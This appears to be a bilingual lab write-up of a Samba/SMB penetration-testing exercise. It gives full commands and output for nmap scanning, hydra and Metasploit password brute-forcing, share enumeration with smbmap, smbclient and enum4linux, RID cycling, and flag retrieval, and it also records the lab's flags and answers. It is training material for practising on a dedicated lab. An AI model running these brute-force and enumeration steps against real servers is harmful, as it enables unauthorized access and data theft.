Exploiting SAMBA
Exploiting SAMBA
SMB (Server Message Block) is a network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a local network (LAN).
SMB uses port 445 (TCP). However, originally, SMB ran on top of NetBIOS using port 139.
Samba is the Linux implementation of SMB, and allows Windows systems to access Linux shares and devices.
SAMBA utilizes username and password authentication in order to obtain access to the server or a network share.
We can perform a brute-force attack on the SAMBA server in order to obtain legitimate credentials.
After obtaining legitimate credentials, we can use a utility called SMBMap in order to enumerate SAMBA share drives, list the contents of the shares as well as download files and execute remote commands on the target.
We can also utilize a tool called smbclient. Smbclient is a client that is part of the SAMBA software suite. It communicates with a LAN Manager server, offering an interface similar to that of the ftp program. It can be used to download files from the server to the local machine, upload files from the local machine to the server as well as retrieve directory information from the server.
利用SAMBA
利用SAMBA
SMB(服务器消息块)是一种网络文件共享协议,用于促进本地网络 (LAN) 上计算机之间的文件和外围设备共享。
SMB 使用端口 445 (TCP)。 然而,最初,SMB 使用端口 139 在 NetBIOS 之上运行。
It’s not uncommon to find Windows systems as well as Linux systems running both Netbios port and the actual SMB port which is port 445. As means of offering compatibility to older systems that still utilize Netbios.
Samba 是 SMB 的 Linux 实现,允许 Windows 系统访问 Linux 共享和设备。
If you ever work within the Windows environment or the environment that has more than 5 or 10 Windows systems. SMB is typically used to share files. How would you do that? Let’s say you are running a system on the local network and someone asks you to share a file or folder. The actual predetermined solution for this is to set up a file share. And the file share can be configured to only be accessed by specific users. In regardless of that, a file share could contain important information parternant to that company or to that particular person. And once you set up a file share, you can provide access to the specific set of files or folders to any user on that local area network. And all of these is been facilited through SMB protocol.
We are going to primarily foucos on enumerating shares, as well as downloading files from these shares.
SAMBA 使用用户名和密码验证来获得对服务器或网络共享的访问权限。
Firstly, identify legitimate crdentials and then authenticating with the SAMBA server, or with the actual target via SAMBA, and of course utilizing thoses credentials to list out the shares, download files from shares, etc. SAMBA utilize username and password authentication just like SMB. In order to obtain access to the server or the network share, now in order to obtain this credentials, we can perform a brute force attack with hydra.
我们可以对 SAMBA 服务器进行暴力攻击,以获取合法凭据。
获得合法凭据后,我们可以使用名为 SMBMap 的实用程序来枚举 SAMBA 共享驱动器、列出共享内容以及下载文件并在目标上执行远程命令。
我们还可以使用一个名为 smbclient 的工具。 Smbclient 是一个客户端,它是 SAMBA 软件套件的一部分。 它与 LAN Manager 服务器通信,提供类似于 ftp 程序的接口。 它可以用于从服务器下载文件到本地机器,从本地机器上传文件到服务器以及从服务器检索目录信息。
Demo: Exploiting SAMBA
1
2
ifconfig
eth1: inet 192.56.47.2
1
nmap -sV 192.56.47.3
Perform a brute force on SMB or SAMBA running on the particular target.
1
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.56.47.3 smb
Enumerate shares on this particular target system.
1
smbmap -H 192.56.47.3 -u admin -p password1
Access to the any of particular shares.
1
2
smbclient
man smbclient
-L: List out the shares.
1
smbclient -L 192.56.47.3 -U admin
Gain access to the smbclient.
1
smbclient //192.56.47.3/shawn -U admin
1
2
3
4
5
6
7
8
9
10
11
12
smb: \> ?
smb: \> dir
smb: \> cd dev\
smb: \> dir
smb: \> cd ..
smb: \> cd run
smb: \> dir
smb: \> cd ..
smb: \> cd test
smb: \> dir
smb: \> cd ..
smb: \> exit
1
smbclient //192.56.47.3/nancy -U admin
1
2
3
4
5
6
7
8
9
10
smb: \> dir
smb: \> cd srv
smb: \> dir
smb: \> cd ..
smb: \> cd dir
smb: \> dir
smb: \> get flag
smb: \> exit
ls
cat flag
Access the admin share.
1
2
3
4
5
6
7
8
9
10
11
12
smbclient //192.56.47.3/nancy -U admin
smb: \> dir
smb: \> cd hidden\
smb: \> dir
smb: \> get flag.tar.gz
smb: \> exit
ls
rm flag
tar xzf flag.tar.gz
ls
cat flag
-a: enumerate all information.
1
enum4linux -a 192.56.47.3
1
enum4linux -a -u admin -p password1 192.56.47.3
Samba Recon: Dictionary Attack
复现视频内容
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.3 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:03 txqueuelen 0 (Ethernet)
RX packets 117 bytes 10642 (10.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 101 bytes 313114 (305.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.58.213.2 netmask 255.255.255.0 broadcast 192.58.213.255
ether 02:42:c0:3a:d5:02 txqueuelen 0 (Ethernet)
RX packets 46 bytes 5458 (5.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 18 bytes 1656 (1.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 1656 (1.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
1
2
3
4
5
6
7
8
9
10
11
12
13
root@attackdefense:~# nmap -sV 192.58.213.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-25 08:57 UTC
Nmap scan report for target-1 (192.58.213.3)
Host is up (0.000010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
MAC Address: 02:42:C0:3A:D5:03 (Unknown)
Service Info: Host: SAMBA-RECON-BRUTE
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# hydra -l admin -P /usr/share/wordlists/metasploit/unix_passwords.txt 192.58.213.3 smb
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-25 09:02:42
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 1009 login tries (l:1/p:1009), ~1009 tries per task
[DATA] attacking smb://192.58.213.3:445/
[445][smb] host: 192.58.213.3 login: admin password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-25 09:02:43
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# smbmap -u admin -p password1 -H 192.58.213.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 192.58.213.3...
[+] IP: 192.58.213.3:445 Name: target-1
Disk Permissions
---- -----------
shawn READ, WRITE
nancy READ ONLY
admin READ, WRITE
IPC$ NO ACCESS
-L: 此选项允许您查看服务器上可用的服务。您将其用作smbclient -L host,应该会出现一个列表。
列出服务器上可用的共享。
-U: username是客户端用于建立连接的用户名,假设您的服务器正在运行允许用户名的协议。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@attackdefense:~# smbclient -L 192.58.213.3 -U admin
Enter WORKGROUP\admin's password:
Sharename Type Comment
--------- ---- -------
shawn Disk
nancy Disk
admin Disk
IPC$ IPC IPC Service (brute.samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
root@attackdefense:~# smbclient '\\192.58.213.3\shawn' -U admin
Enter WORKGROUP\admin's password:
Try "help" to get a list of possible commands.
smb: \> ?
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> dir
. D 0 Tue Oct 25 09:04:44 2022
.. D 0 Tue Nov 27 19:25:12 2018
test D 0 Tue Nov 27 19:25:12 2018
dev D 0 Tue Nov 27 19:25:12 2018
run D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46831332 blocks available
smb: \> cd test
smb: \test\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 09:04:44 2022
1981084628 blocks of size 1024. 46831336 blocks available
smb: \test\> cd ..
smb: \> cd dev
smb: \dev\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 09:04:44 2022
1981084628 blocks of size 1024. 46823104 blocks available
smb: \dev\> cd ..
smb: \> cd run
smb: \run\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 09:04:44 2022
1981084628 blocks of size 1024. 46823100 blocks available
smb: \run\> exit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@attackdefense:~# smbclient '\\192.58.213.3\nancy' -U admin
Enter WORKGROUP\admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
dir D 0 Tue Nov 27 19:25:12 2018
tmp D 0 Tue Nov 27 19:25:12 2018
srv D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46789356 blocks available
smb: \> cd dir
smb: \dir\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
flag N 33 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46789308 blocks available
smb: \dir\> get flag
getting file \dir\flag of size 33 as flag (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)
smb: \srv\> exit
root@attackdefense:~# ls
README flag tools wordlists
root@attackdefense:~# cat flag
a1157f23d040fb4bc6f9a7277de65bf7
root@attackdefense:~# rm flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@attackdefense:~# smbclient '\\192.58.213.3\admin' -U admin
Enter WORKGROUP\admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Oct 25 09:04:44 2022
.. D 0 Tue Nov 27 19:25:12 2018
hidden D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46780284 blocks available
smb: \> cd hidden\
smb: \hidden\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 09:04:44 2022
flag.tar.gz N 151 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 46780372 blocks available
smb: \hidden\> get flag.tar.gz
getting file \hidden\flag.tar.gz of size 151 as flag.tar.gz (73.7 KiloBytes/sec) (average 73.7 KiloBytes/sec)
smb: \hidden\> exit
root@attackdefense:~# ls
README flag.tar.gz tools wordlists
root@attackdefense:~# tar zxf flag.tar.gz
root@attackdefense:~# ls
README flag flag.tar.gz tools wordlists
root@attackdefense:~# cat flag
2727069bc058053bd561ce372721c92e
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
root@attackdefense:~# enum4linux -u admin -p password1 -a 192.58.213.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 25 09:31:50 2022
==========================
| Target Information |
==========================
Target ........... 192.58.213.3
RID Range ........ 500-550,1000-1050
Username ......... 'admin'
Password ......... 'password1'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.58.213.3 |
====================================================
[+] Got domain/workgroup name: RECONLABS
============================================
| Nbtstat Information for 192.58.213.3 |
============================================
Looking up status of 192.58.213.3
RECONLABS <00> - <GROUP> H <ACTIVE> Domain/Workgroup Name
RECONLABS <1e> - <GROUP> H <ACTIVE> Browser Service Elections
SAMBA-RECON-BRU <00> - H <ACTIVE> Workstation Service
SAMBA-RECON-BRU <03> - H <ACTIVE> Messenger Service
SAMBA-RECON-BRU <20> - H <ACTIVE> File Server Service
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.58.213.3 |
=====================================
[+] Server 192.58.213.3 allows sessions using username 'admin', password 'password1'
===========================================
| Getting domain SID for 192.58.213.3 |
===========================================
Domain Name: RECONLABS
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 192.58.213.3 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.58.213.3 from smbclient:
[+] Got OS info for 192.58.213.3 from srvinfo:
SAMBA-RECON-BRUWk Sv PrQ Unx NT SNT brute.samba.recon.lab
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 192.58.213.3 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: shawn Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: nancy Name: Desc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: jane Name: Desc:
index: 0x4 RID: 0x3eb acb: 0x00000010 Account: admin Name: Desc:
user:[shawn] rid:[0x3e8]
user:[nancy] rid:[0x3ea]
user:[jane] rid:[0x3e9]
user:[admin] rid:[0x3eb]
=========================================
| Share Enumeration on 192.58.213.3 |
=========================================
Sharename Type Comment
--------- ---- -------
shawn Disk
nancy Disk
admin Disk
IPC$ IPC IPC Service (brute.samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS
[+] Attempting to map shares on 192.58.213.3
//192.58.213.3/shawn Mapping: OK, Listing: OK
//192.58.213.3/nancy Mapping: OK, Listing: OK
//192.58.213.3/admin Mapping: OK, Listing: OK
//192.58.213.3/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
====================================================
| Password Policy Information for 192.58.213.3 |
====================================================
[+] Attaching to 192.58.213.3 using admin:password1
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] SAMBA-RECON-BRUTE
[+] Builtin
[+] Password Info for Domain: SAMBA-RECON-BRUTE
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.58.213.3 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
group:[Testing] rid:[0x3ee]
[+] Getting local group memberships:
[+] Getting domain groups:
group:[Maintainer] rid:[0x3ec]
group:[Reserved] rid:[0x3ed]
[+] Getting domain group memberships:
=======================================================================
| Users on 192.58.213.3 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-2
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3690628376-3985617143-2159776750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-2 and logon username 'admin', password 'password1'
S-1-22-2-1000 Unix Group\admins (Domain Group)
S-1-22-2-1001 Unix Group\Maintainer (Domain Group)
S-1-22-2-1002 Unix Group\Reserved (Domain Group)
S-1-22-2-1003 Unix Group\Testing (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username 'admin', password 'password1'
S-1-22-1-1000 Unix User\shawn (Local User)
S-1-22-1-1001 Unix User\jane (Local User)
S-1-22-1-1002 Unix User\nancy (Local User)
S-1-22-1-1003 Unix User\admin (Local User)
[+] Enumerating users using SID S-1-5-21-3690628376-3985617143-2159776750 and logon username 'admin', password 'password1'
S-1-5-21-3690628376-3985617143-2159776750-501 SAMBA-RECON-BRUTE\nobody (Local User)
S-1-5-21-3690628376-3985617143-2159776750-513 SAMBA-RECON-BRUTE\None (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1000 SAMBA-RECON-BRUTE\shawn (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1001 SAMBA-RECON-BRUTE\jane (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1002 SAMBA-RECON-BRUTE\nancy (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1003 SAMBA-RECON-BRUTE\admin (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1004 SAMBA-RECON-BRUTE\Maintainer (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1005 SAMBA-RECON-BRUTE\Reserved (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1006 SAMBA-RECON-BRUTE\Testing (Local Group)
[+] Enumerating users using SID S-1-5-32 and logon username 'admin', password 'password1'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
=============================================
| Getting printer info for 192.58.213.3 |
=============================================
No printers returned.
enum4linux complete on Tue Oct 25 09:32:08 2022
概述
在这个挑战中,我们将研究 SMB 服务器上的字典攻击。请开始实验并回答以下问题:
问题
- 访问共享“jane”需要用户“jane”的密码是多少?使用 smb_login metasploit 模块和密码 wordlist /usr/share/wordlists/metasploit/unix_passwords.txt
- 访问共享“admin”需要用户“admin”的密码是多少?使用 hydra 和密码 wordlist:/usr/share/wordlists/rockyou.txt
- 哪个共享是只读的?将 smbmap 与问题 2 中获得的凭据一起使用。
- 共享“简”是否可浏览?使用从第一个问题获得的凭据。
- 从共享“admin”中获取标志
- 列出 samba 服务器上 SMB 上可用的命名管道?将 pipe_auditor metasploit 模块与从问题 2 中获得的凭据一起使用。
- 通过使用 enum4Linux 和问题 2 中获得的凭据执行 RID 循环,分别列出 Unix 用户 shawn、jane、nancy 和 admin 的 sid。
指示:
- 这个实验室是献给你的!此网络上没有其他用户 :)
- 开始实验室后,您将可以访问 Kali 实例的根终端
- 你的 Kali 有一个 IP 地址为 192.XYZ 的接口运行“ip addr”来知道 X 和 Y 的值。
- 目标机器应位于 IP 地址 192.XY3。
- 不要攻击位于 IP 地址 192.XY1 的网关
我自己的思路
What is the password of user “jane” required to access share “jane”? Use smb_login metasploit module with password wordlist /usr/share/wordlists/metasploit/unix_passwords.txt
jane:abc123
1
2
3
4
msf5 auxiliary(scanner/smb/smb_login) > ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.38.66.2 netmask 255.255.255.0 broadcast 192.38.66.255
ether 02:42:c0:26:42:02 txqueuelen 0 (Ethernet)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.38.66.3
RHOSTS => 192.38.66.3
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser jane
SMBUser => jane
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 192.38.66.3:445 - 192.38.66.3:445 - Starting SMB login bruteforce
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:admin',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:123456',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:12345',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:123456789',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:password',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:iloveyou',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:princess',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:1234567',
[-] 192.38.66.3:445 - 192.38.66.3:445 - Failed: '.\jane:12345678',
[+] 192.38.66.3:445 - 192.38.66.3:445 - Success: '.\jane:abc123'
[*] 192.38.66.3:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What is the password of user “admin” required to access share “admin”? Use hydra with password wordlist: /usr/share/wordlists/rockyou.txt
admin:password1
1
2
3
4
5
root@attackdefense:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz sqlmap.txt wfuzz
root@attackdefense:/usr/share/wordlists# gzip -d rockyou.txt.gz
root@attackdefense:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt sqlmap.txt wfuzz
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.38.66.3 smb
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-25 10:38:30
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.38.66.3:445/
[445][smb] host: 192.38.66.3 login: admin password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-25 10:38:32
Which share is read only? Use smbmap with credentials obtained in question 2.
nancy
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# smbmap -H 192.38.66.3 -u admin -p password1
[+] Finding open SMB ports....
[+] User SMB session establishd on 192.38.66.3...
[+] IP: 192.38.66.3:445 Name: target-1
Disk Permissions
---- -----------
shawn READ, WRITE
nancy READ ONLY
admin READ, WRITE
IPC$ NO ACCESS
Is share “jane” browseable? Use credentials obtained from the 1st question.
Yes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root@attackdefense:~# smbclient //192.38.66.3/jane -U jane
Enter WORKGROUP\jane's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
logs D 0 Tue Nov 27 19:25:12 2018
flag D 0 Tue Nov 27 19:25:12 2018
admin D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63976192 blocks available
smb: \> cd logs
smb: \logs\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63976244 blocks available
smb: \logs\> cd ..
smb: \> cd flag
smb: \flag\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
flag N 33 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63976188 blocks available
smb: \flag\> get flag
getting file \flag\flag of size 33 as flag (32.2 KiloBytes/sec) (average 32.2 KiloBytes/sec)
smb: \flag\> cd ..
smb: \> cd admin
smb: \admin\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63973472 blocks available
smb: \admin\> exit
root@attackdefense:~# cat flag
16cb5a2bebf654439291fc9b73b0a6d0
Fetch the flag from share “admin”
2727069bc058053bd561ce372721c92e
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@attackdefense:~# smbclient //192.38.66.3/admin -U admin
Enter WORKGROUP\admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Oct 25 10:42:11 2022
.. D 0 Tue Nov 27 19:25:12 2018
hidden D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63973232 blocks available
smb: \> cd hidden\
smb: \hidden\> dir
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Oct 25 10:42:11 2022
flag.tar.gz N 151 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 63973392 blocks available
smb: \hidden\> get flag.tar.gz
getting file \hidden\flag.tar.gz of size 151 as flag.tar.gz (147.4 KiloBytes/sec) (average 147.5 KiloBytes/sec)
smb: \hidden\> exit
root@attackdefense:~# rm flag
root@attackdefense:~# tar zxf flag.tar.gz
root@attackdefense:~# ls
README flag flag.tar.gz tools wordlists
root@attackdefense:~# cat flag
2727069bc058053bd561ce372721c92e
List the named pipes available over SMB on the samba server? Use pipe_auditor metasploit module with credentials obtained from question 2.
netlogon, lsarpc, samr, eventlog, InitShutdown, ntsvcs, srvsvc, wkssvc
SMB 会话管道审计员
确定可以通过 SMB 访问哪些命名管道
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@attackdefense:~# service postgresql start && msfconsole -q
[ ok ] Starting PostgreSQL 11 database server: main.
msf5 > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.38.66.3
RHOSTS => 192.38.66.3
msf5 auxiliary(scanner/smb/pipe_auditor) > set SMBUser admin
SMBUser => admin
msf5 auxiliary(scanner/smb/pipe_auditor) > set SMBPass password1
SMBPass => password1
msf5 auxiliary(scanner/smb/pipe_auditor) > run
[+] 192.38.66.3:139 - Pipes: \netlogon, \lsarpc, \samr, \eventlog, \InitShutdown, \ntsvcs, \srvsvc, \wkssvc
[*] 192.38.66.3: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
List sid of Unix users shawn, jane, nancy and admin respectively by performing RID cycling using enum4Linux with credentials obtained in question 2.
1
2
3
4
5
[+] Enumerating users using SID S-1-22-1 and logon username 'admin', password 'password1'
S-1-22-1-1000 Unix User\shawn (Local User)
S-1-22-1-1001 Unix User\jane (Local User)
S-1-22-1-1002 Unix User\nancy (Local User)
S-1-22-1-1003 Unix User\admin (Local User)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
root@attackdefense:~# enum4linux -u admin -p password1 -r 192.38.66.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 25 11:02:00 2022
==========================
| Target Information |
==========================
Target ........... 192.38.66.3
RID Range ........ 500-550,1000-1050
Username ......... 'admin'
Password ......... 'password1'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 192.38.66.3 |
===================================================
[+] Got domain/workgroup name: RECONLABS
====================================
| Session Check on 192.38.66.3 |
====================================
[+] Server 192.38.66.3 allows sessions using username 'admin', password 'password1'
==========================================
| Getting domain SID for 192.38.66.3 |
==========================================
Domain Name: RECONLABS
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================================================
| Users on 192.38.66.3 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-22-2
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3690628376-3985617143-2159776750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username 'admin', password 'password1'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
